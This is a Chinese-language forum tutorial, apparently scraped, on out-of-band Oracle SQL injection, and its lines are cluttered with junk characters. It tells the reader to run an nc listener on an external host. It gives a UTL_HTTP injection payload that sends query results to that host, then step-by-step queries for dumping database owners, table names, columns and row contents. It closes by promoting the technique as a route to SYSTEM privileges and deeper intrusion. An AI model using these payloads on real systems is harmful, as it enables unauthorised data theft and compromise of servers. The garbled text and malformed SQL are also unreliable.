首先外网nc监听对应的端口 % q3 V: n+ t7 a8 ~. c
and UTL_HTTP.request("外网ip:port/"(sql语句))=1--
" s2 h) N1 j/ R4 D( q! G 爆库 ( |" Q8 D1 D! W! W
select owner from all_tables where rownum=1
% |- K2 T+ l* Y3 O select owner from all_tables where owner"第一个库名" " ~& Q: I) @9 w3 B
0 x9 v+ E0 d# f6 A I2 ]0 _& _ and rownum=1 3 x, ~ }$ L4 a$ ?, h" Q
select owner from all_tables where owner"第一个库名" , o7 U, @8 D* s: E) o
and owner"第二个"and rownum=1
$ P j. R5 T6 ?: d select owner from all_tables where owner"第一个库名" ! s0 v% W0 r( t2 {3 \
and owner"第一个库名" and rownum=1 2 F% x! q2 y2 `
以此论推
" V, P* x8 Q( |' j6 j1 v8 S% H 爆表
: v* P1 v! s7 `- O- w1 E k- U, s% H select TABLE_NAME from all_tables where owner="库名" - b) V* B) `& N0 j
and rownum=1
6 |2 B. q% k, \* h0 {0 l: }8 M select TABLE_NAME from all_tables where owner="库名"
/ p* S$ I( ^2 G Q- A and rownum=1 and TABLE_NAME"表名1" ) `! v5 E) y s# s- d- _, P
select TABLE_NAME from all_tables where owner="库名"andrownum=1 3 v: U7 R, B! R
and TABLE_NAME"表名1" and TABLE_NAME"表名2"
' n2 j9 h5 ^! z; L; A3 I 以此论推
& G! Y0 t6 F8 \ 爆列
/ i2 ?; |. n6 _2 N# O select COLUMN_NAME from user_tab_columns wheretable_name="表名" 0 }9 _; N5 G7 g6 T
and rownum=1
C4 J3 e9 \7 s6 y( I select COLUMN_NAME from user_tab_columns wheretable_name="表名"
" f2 Z; \2 w t9 o1 f; T and rownum=1 and COLUMN_NAME"第一个爆出的列名"
2 z! W( M; R$ f2 s$ g3 G" p. s select COLUMN_NAME from user_tab_columns wheretable_name="表名"
& U3 Y* g* ?. y2 R3 D' Y/ t- i/ A6 {" Z and rownum=1 and COLUMN_NAME"第一个爆出的列名"andCOLUMN_NAME"第二个爆出的列名"
+ p' R' b. U+ L 爆内容
0 O8 ?9 A7 ]3 z# i% Z0 a; I. D9 T 第一个内容:select 列名 from 表名 where rownum=1
2 W& V2 ?) v; V 第二个内容:select 列名 from 表名 where rownum=1 and 列名"第一个值"
& i, T) S3 u2 D0 \! | 第三个内容:select 列名 from 表名 where rownum=1 and 列名"第一个值"and列名"第二个值"
; Y' K0 f( T- [9 b: a% W* _ 以此论推 : x, q/ `& N! `; I/ |
注
5 I9 O3 _6 r( ?- Q 1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料 2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁。 |